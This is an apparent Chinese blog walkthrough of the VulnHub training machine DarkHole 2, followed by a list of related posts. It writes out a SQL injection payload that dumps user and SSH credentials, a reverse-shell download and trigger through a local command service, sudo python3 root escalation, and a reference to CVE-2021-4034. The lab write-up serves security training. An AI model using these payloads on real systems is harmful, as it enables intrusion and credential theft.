DARKHOLE 2
准备
攻击机: kali, win11
靶机: DARKHOLE: 2 NAT 192.168.91.0 网段
下载链接:
https://www.vulnhub.com/entry/darkhole-2,740/
信息搜集与利用
主机发现
python3 ping.py -H 192.168.91.0/24
如图所示得到目标靶机IP地址: 192.168.91.191
端口扫描
nmap -sV -O -A -p- -T4 192.168.91.191 --oN DarkHole2_nmap.txt
如图所示开放了 22,80, 其中发现了 git 泄露,目录扫描那么也能发现
目录扫描
python3 dirsearch.py -u http://192.168.91.191/
挨个儿访问
git 泄露
python2 .\git_extract.py http://192.168.91.191/.git/
注意:git_extract 工具有时候可能下载不完整,推荐方法换一个工具,github开源很多。
用工具下载到本地。
代码审计
index.php 中:
很明显看到 dashboard.php?id=xxxx, 且 跟 SESSION 相关。
login.php中:
如图所示:有账号密码(lush@admin.com:321),待会儿看能不能登陆进去。
login.php 0904b1 中:
如图所示: 得到了 sql 语句,其中对 email,pass 两个变量调用了 mysqli_real_escape_string,htmlspecialchars 这两个函数,这两个函数的作用大致就是对其输入进行转换过滤,那么在登陆界面sql注入几乎是不太可能的了。函数具体用法自行翻看手册。
config.php 中:
如图所示: 用户名: root ,密码:空,数据库: darkhole_2
COMMIT_EDITMSG 中:
如图所示: 翻译过来: 我更改了 login.php 文件以更安全
HTTP
http://192.168.91.191/login.php
来当登陆界面,尝试用刚刚找的邮箱和密码登陆
如图所示:登陆成功,同时可以看到 上方 URL 处 id=1,那么存在sql注入的可能性。
要么 sqlmap 一把梭或者手动注入
SQLI注入
手动注入的话,是很基础的。详细步骤省略。
http://192.168.91.191/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(username,0x2d,password) from users --+
如图所示:得到 users 表中的用户名和密码:
Jehad Alqurashiasddasdasdas:321
http://192.168.91.191/dashboard.php?id=-1' union select 1,2,3,4,5,group_concat(user,0x2d,pass) from ssh--+
如图所示:得到 ssh 表中的用户和密码:
jehad:fool
ssh 登陆
既然是 ssh 表,那么尝试ssh 登陆
如图所示:登陆成功
cat /etc/passwd | grep "/bin/bash"
如图所示:具有 /bin/bash 的用户除了 root 外 有: lama, jehad, losy 。
查看 历史命令记录
cat .bash_history
发现本地有9999端口的服务。
查看 socket 统计信息
ss -antp
如图所示: 可以看到 127.0.0.1:9999 端口存在活动。
提权
方法一
方法一:按照作者思路
curl "http://127.0.0.1:9999/"
查看一下本地服务的内容
如图所示:可以看到 GET 了 一个 cmd 参数,与历史记录相符合。在历史命令记录中: wget 下载了一个 反弹shell
那我们也要来反弹shell,
编辑本地得 php-reverse-shell.php 将IP改为 kali 得 IP地址和监听端口。
在本地启动一个http 服务用于下载
python3 -m http.server 8000
然后将其下载到把集中,然后 利用 127.0.0.1?cmd 来执行
wget http://172.46.237.107:8000/php-reverse-shell.php
执行
curl "http://127.0.0.1:9999/?cmd=php%20/tmp/php-reverse-shell.php"
如图所示 反弹 shell 成功,且是 losy 用户的 shell ,不是 jehad 用户。
python3 -c "import pty;pty.spawn(’/bin/bash’)"
切换到标准 shell
flag 1
losy 家目录下 user.txt
在 jehad 用户中我们查看了 命令历史记录,在这里我们查看一下啊 losy 用户的历史记录
cat -n ./bash_history
如图所示:在第 88 行 发现了账号密码: losy:gang, 最后只有密码也为: gang。
sudo -l 查看命令
如图所示:输入 sudo -l 需要输入密码,而密码正好是 gang , 同时** /usr/bin/python3** 可以提权。
直接 sudo /usr/bin/python3 执行python 文件就能得到 root
sudo /usr/bin/python3 -c "import os;os.system(’/bin/bash’)"
如图所示: sudo 提权成功。
flag 2
方法二
find / -perm -u=s -type f 2>/dev/null
老方法查看SUID权限内容,发现一个眼熟的:
/usr/lib/policykit-1/polkit-agent-helper-1
对应于 CVE-2021-4034
在我以前的文章中有说到 这个漏洞。这个漏洞今年才发布,在2021年的l对于Linux 影响很深,几乎所有的发行版本都存在这个漏洞,因此这个靶机诞生的那一天,这个漏洞还不存在。在今天(2022年2月18日)来说这就是一个新的提权方法。关于 CVE-2021-4034 的详细信息请自行搜索。
直接利用它: 具体使用方法请看我最近的文章。
总结
- git 泄漏
- sql注入
- 命令执行
- 反弹shell
- CVE-2021-4034
DARKHOLE 2相关推荐
- vulnhub靶机darkhole
靶机下载地址:DarkHole: 1 ~ VulnHub Kali ip:192.168.174.128 靶机ip:192.168.174.135 靶机ip发现 sudo arp-scan -l 开放 ...
- 靶场攻略 | DarkHole:1
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全.企业安全.国家安全. 1.靶机信息 下载地 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole
Vulnhub靶机DarkHole渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:逻辑漏洞: ③:文件上传 ...
- [渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
kali IP地址为192.168.127.139 靶机 IP地址为192.168.127.144 目录 一.信息搜集 1.1.扫描主机口 1.2. 扫描端口 1.3.访问端口 1.4.扫描目录 二. ...
- DARKHOLE: 2
信息收集 靶机下载地址为:vulnhub-DARKHOLE: 2 今日 的靶机漏洞练习 kali :100.100.100.131/24 靶机:100.100.100.132/24 依旧使用nmap神 ...
- DARKHOLE_1攻略
DARKHOLE_1攻略 简介DARKHOLE_1攻略攻击环境:kali被攻击环境:ubuntukali IP:192.168.133.131ubuntu IP : 未知1.主机发现 因为攻击机与被 ...
- DarkHole_2
文章目录 靶机环境 一.信息收集 二. 漏洞利用 三.权力提升 总结 靶机环境 攻击机:kali IP:192.168.247.129 靶机:DarkHole_2 IP:192.168.247.131 ...
- 原版蓝光光盘加国语配音加中文字幕及解说字幕保留弹出菜单傻瓜版教程
原版蓝光光盘加国语配音加中文字幕及解说字幕保留弹出菜单傻瓜版教程 闲来无事,发现了一本通俗易懂的教程,转发过来,让有点基础的同行们学习一下. 在这感谢原著者的辛勤劳动! 1. 得到片源 朋友到国外出差 ...
- C_教程_Ubuntu安装COMSOL-MATLAB-FDTD Solutions
title categories tags Ubuntu软件安装以及使用注意事项 技术 Linux 语法参考 https://www.jianshu.com/p/b03a8d7b1719 常用软件列表 ...
最新文章
- 桂林机场春运期间新增多条航线航班 实现接力承运无缝衔接
- linux目录结构 各个目录文件作用
- 北京站售票员内部大量出票无耻的售票员(转)
- python学习笔记(IO模型)
- 鸟哥的Linux私房菜(服务器)- 簡易 Cluster 架設
- 复合索引的列顺序判断
- boost::uuids::entropy_error相关的测试程序
- 7-6 区间覆盖 (10 分)(思路+详解)Come 宝!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- win7如何将计算机移至桌面,如何将win7电脑桌面的文件转移到其他盘中?
- LeetCode MySQL 585. 2016年的投资(窗口函数over(partition by xx))
- IDA远程调试Android
- 关于Spring Cloud Config服务器介绍
- opencv 滑动条创建
- IntelliJ IDEA 必备的快捷键大全
- nginx史上最强入门教学
- C# 读取xls格式的文件
- Latex 中文Beamer模板
- 计算机页面里的坚果云删不了怎么回事,坚果云 常见问题
- EXCEL实用技巧-多条件求和、多条件计数、多条件查找
- Spring之ApplicationContext介绍